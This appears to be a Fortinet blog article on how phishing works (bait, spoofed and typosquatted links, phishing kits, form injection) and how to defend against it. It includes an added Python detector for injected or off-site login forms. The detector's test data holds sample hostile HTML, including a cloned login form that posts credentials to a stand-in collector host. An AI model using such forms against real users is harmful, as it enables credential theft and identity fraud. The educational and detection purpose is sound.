Phishing 101

There are many dangerous threats lurking in cyberspace today, from software vulnerabilities and exploits to viruses and botnets. Among these threats are phishing attacks: an electronic communication scam that attempts to obtain highly personal information such as credit card numbers, user names and passwords by assuming the identity of a trustworthy entity. The trustworthy entity can be anything from a friend whose email account has been compromised to a large, legitimate corporation such as a bank or an online retailer like Amazon or eBay. A typical phisher’s tackle box consists of bait, a hook and sometimes a phishing kit.

Laying the Bait

To lure victims into disclosing sensitive information, phishers exploit the human mind through the art of social engineering. They do this by baiting individuals with electronic messages that contain popular and/or relevant material. The bait may be laid through emails, social networking sites and instant or mobile text messages. For example, a phisher may spoof an email from the victim’s bank claiming that their account needs to be updated. These emails can look VERY realistic and official, up to and including the bank’s logo and a URL that appears to point to the legitimate site. Or, the phish could come from a social networking site where the body of the message asks the victim to view updated photos or a “funny video” after logging in with their username and password. Online gaming accounts are also frequently targeted through gaming forum invite messages.

Identifying the Bait: Most phishing messages arrive unsolicited. Be wary of such messages, especially if an action or response is required on your part, no matter how urgent it seems. Whenever possible, verify the sender. If a questionable message appears to come from someone you know, reply with a specific question to confirm it really is them. For confidential material that must be sent by e-mail, PGP encryption and digital signing are recommended to confirm the identity of both parties.

The Hook

After supplying the bait, the attacker needs to hook information from the victim. In its simplest form, this is done purely through email: asking the user to reply with the requested information, or to call a given number. The latter case is known as “vishing” (defined below). Scams such as advance fee fraud (aka the 419 Nigerian scam) follow this response method. Usually, though, the hook is provided in the form of a link (URL). Links are commonly spoofed: the link text will appear to point to the proper site (http://www.validbank.com) but in reality the link goes to a completely different site. Typosquatting is also popular: attackers register a domain that differs only slightly from the legitimate one so that it looks right at first glance (e.g. http://www.val1dbank.com).

Avoiding the Hook: Always pay attention to links (“think before you link”) before you click. Hover your mouse over a link to see where it is really taking you before clicking. Carefully observe the domain in the link. Remember, “validbank.com” is different from “validbank.com.accounts.com”. Never give out a credit card number in response to an unsolicited request. Always ensure SSL (HTTPS) secure transactions are enabled when making any transaction online (look for the lock icon in your browser). If the browser claims the certificate is not valid, hold off until you have verified with security experts (you can contact FortiGuard Labs anytime through http://www.fortiguard.com). Finally, do a search to see if others have spotted any suspicious activity matching the subject line or content of the message. Fortinet’s FortiGuard blog is a great place to start.

Phishing Kits

Attackers may obtain kits to deploy on Web servers to make their phish seem legitimate. These kits often contain pre-supplied templates for popular banks and social networking sites. After a victim is hooked, they are brought to the attacker-controlled Website and presented with the matching template (i.e. HTML code and graphics that mirror www.validbank.com’s layout). Of course, when the victim enters their credentials, they are sent to the phisher’s Website and collected by the phishing kit. Like most crimeware (software tools used for criminal purposes), hundreds of phishing kits exist today. One of the most popular is the Rock Phish kit. Botnets such as Zeus and SpyEye carry more advanced phishing components, which use a technique known as form injection. In this case, the user’s machine is already compromised (even if they log in to validbank’s real site, their credentials will be sent to the attacker regardless). The attacker then extracts further information by injecting additional fields into the banking session while the victim is logging in. For example, they will add a field asking for a driver’s license number or mother’s maiden name. These details are then leveraged down the road, typically for identity fraud.

Detecting Kits: Common phishing kits can be detected by using antivirus and Web filtering applications. Generic antivirus detection can help identify a kit no matter which Web server it is deployed on. Web filtering can guard against phishing Web servers even when they change code or templates to avoid detection. Kits can redirect you to the original site after hooking your information, so it is not good practice to assume that, because you could log in successfully, nothing malicious has occurred.
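Both the form-injection technique described under Phishing Kits and the detection theme of this paragraph come down to one question: does the login form the user sees contain exactly the fields the real site ships, and does it post back to the real site? The following is an added example, not code from the article or from any Fortinet product: it inventories the fields of every form on a page, diffs them against a known-good baseline, and lists forms whose action points off-site. The baseline, the HTML pages and the hostnames are constructed for this example. One caveat a practitioner would want: a form-injecting trojan alters the page inside the victim’s browser, so this comparison must run against the DOM the user actually sees (from a browser extension or a page-integrity monitor), not against a copy fetched from the server.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormFieldCollector(HTMLParser):
    """Record the action and the named input fields of every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []      # one dict per form: {"action": str, "fields": [names]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            # Buttons collect nothing from the user, so they are not tracked.
            if a.get("name") and a.get("type", "").lower() not in (
                    "submit", "button", "reset", "image"):
                self._current["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html: str) -> list:
    parser = FormFieldCollector()
    parser.feed(html)
    parser.close()
    return parser.forms


def find_injected_fields(html: str, baseline: dict) -> dict:
    """Diff every known form against its baseline field set.

    baseline maps a form action to the set of field names it should have.
    Returns {action: [unexpected field names]} for forms that grew extra fields.
    """
    injected = {}
    for form in extract_forms(html):
        expected = baseline.get(form["action"])
        if expected is None:
            continue
        extra = sorted(set(form["fields"]) - expected)
        if extra:
            injected[form["action"]] = extra
    return injected


def offsite_actions(html: str, site_host: str) -> list:
    """Actions of forms that submit to a host other than the site itself."""
    site_host = site_host.lower()
    hits = []
    for form in extract_forms(html):
        target = urlparse(form["action"]).hostname
        if target and target.lower() != site_host:
            hits.append(form["action"])
    return hits


# Constructed baseline: the genuine login form has exactly these two fields.
BASELINE = {"/login": {"username", "password"}}

# Constructed page as the real site serves it.
CLEAN_PAGE = """
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
"""

# Constructed page after a form-injecting trojan modified it in the browser.
INJECTED_PAGE = """
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <label>For your security, please confirm:</label>
  <input type="text" name="mothers_maiden_name">
  <input type="text" name="drivers_license">
  <input type="submit" value="Sign in">
</form>
"""

# Constructed kit-style clone: same look, but credentials post elsewhere.
KIT_PAGE = """
<form action="http://collector.example.net/post.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
"""

if __name__ == "__main__":
    print(find_injected_fields(INJECTED_PAGE, BASELINE))
    print(offsite_actions(KIT_PAGE, "www.validbank.com"))
```

The baseline is keyed by form action so that a page with several forms (search, login, contact) is compared form by form; a form the baseline does not know is skipped here, though a stricter deployment would flag it as well.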

The Four Types of Phishing Scams

Blind Phishing

Blind phishing is simply the act of casting the bait out into cyberspace, usually through mass spam emails, hoping someone will bite. These attacks usually go after common targets such as banking and social network credentials.

Spear-Phishing

Spear-phishing involves a specific, chosen target. These attacks are premeditated and much more effective thanks to a higher level of social engineering. They usually go after specific assets, such as database credentials.

Whaling

Whaling is simply spear-phishing that goes after high-profile targets, such as celebrities or C-level executives.

Vishing

Vishing is phishing over telephone systems. It is more common to vish on response (requiring the victim to call back) than to vish directly with an initial phone call.

No matter which type of phishing attack is used, the same security practices outlined above apply. This is especially true for spear-phishing: because those messages are tailored to the target, it is all the more important to catch them at the earlier stages (baiting and hooking).

Author bio: Derek Manky is FortiGuard Labs’ senior security strategist and contributes to security research and development, while also acting as a bridge to the public forum on results and findings. He coordinates research team efforts and manages responsible disclosure efforts between Fortinet and other vendors.

http://blog.fortinet.com/phishing-101/
